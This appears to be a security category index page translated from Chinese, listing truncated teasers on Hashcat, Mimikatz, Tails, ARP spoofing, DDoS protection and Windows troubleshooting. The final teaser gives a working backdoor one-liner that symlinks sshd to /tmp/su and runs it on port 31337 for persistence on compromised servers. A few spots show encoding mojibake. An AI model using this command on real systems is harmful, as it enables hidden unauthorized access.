Category: Security

How to Disable IP Security Policies in Windows Server 2003

Today while helping a client troubleshoot a system that couldn’t be accessed remotely, I ran into an issue. Upon inspection, port 3389 was open normally, the Terminal Services service was also running normally, and the firewall and everything else were turned off, but I still couldn’t connect remotely to the host — though connections from within the host itself worked fine.

After further investigation …

Top 10 Security Mistakes System Administrators Must Avoid

Security isn’t just a technical issue 鈥?it’s a people problem. Many low-level mistakes are surprisingly often made by those who should know better: system administrators or other IT staff. Intermedia’s 2015 Insider Risk Report found that IT professionals are the most likely to carry out&ldq …

Open-Source Network Forensics Tool Xplico

Xplico鈥檚 goal is to extract internet traffic and capture the information contained within application data. For example, Xplico can extract email content (via POP, IMAP, SMTP protocols), all HTTP content, each VoIP access (SIP), FTP, TFTP, and more from pcap files, but Xplico is not a …

Renowned Hash Cracking Tool Hashcat Goes Open Source

As the best GPU-accelerated hash cracking software available today, Hashcat is touted as the world’s fastest, “supporting up to 8 billion password guesses per second.” In the early hours of December 5 (Beijing time), Hashcat’s author “atom” announced the tool would go open-source. Hashcat is a GPU-based H …

How to Set Up DDoS Protection on Alibaba Cloud Security Center

Alibaba Cloud Shield can protect against Layer 3 to Layer 7 DDoS attacks such as SYN Flood, UDP Flood, ACK Flood, ICMP Flood, DNS Flood, and CC attacks. The setup method is as follows:
1. Open www.aliyun.com and click the Management Console to log in to your member account. 2. Click Cloud Shield Management Console on the left, then click …

How Strong Is Tails, the Anonymous OS Used by Edward Snowden

Tails, the anonymous operating system reportedly used by former NSA contractor Edward · Snowden (the central figure of the PRISM scandal) and others, has recently released its official version 1.0. In the release announcement, the team stated that version 1.0 is an important milestone marking the system’s maturity. The first public version of the system …

Common Website Attack Methods and Protection Guide

How Webmasters Can Defend Against Frequent DDoS and Hacking Attacks
As a webmaster who diligently edits and promotes content to earn a small amount of advertising revenue, you will inevitably face hacker attacks as your website traffic grows. My site has experienced two incidents where attacks caused its death or瘫痪. The first time, my DedeCMS site was completely hijacked by gambling spam, killing the site. The second time was a traffic attack I just experienced…

ARP Attack Detection and Solution Summary

ARP attacks primarily occur within local area networks (LANs). If one computer on a LAN is infected with an ARP trojan, that compromised system will attempt to intercept communication data from other computers on the same network through “ARP spoofing,” thereby disrupting the connections of other machines on the network …

Windows Password Extraction Tool Mimikatz 2.0 Released

Just borrow a computer and you can easily grab the passwords…… “Goddess, may I borrow your computer for a moment?” This is something all the pros know about, a common tool for penetration testing. A lightweight debugger written by a badass French developer that helps security testers capture Windows passwords. mimik …

SSH Penetration Techniques

Some tricks to fool rookie admins. After gaining SHELL access, if the target firewall has no restrictions, execute on the compromised server: ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=31337; to spawn an SSH service on port 31337.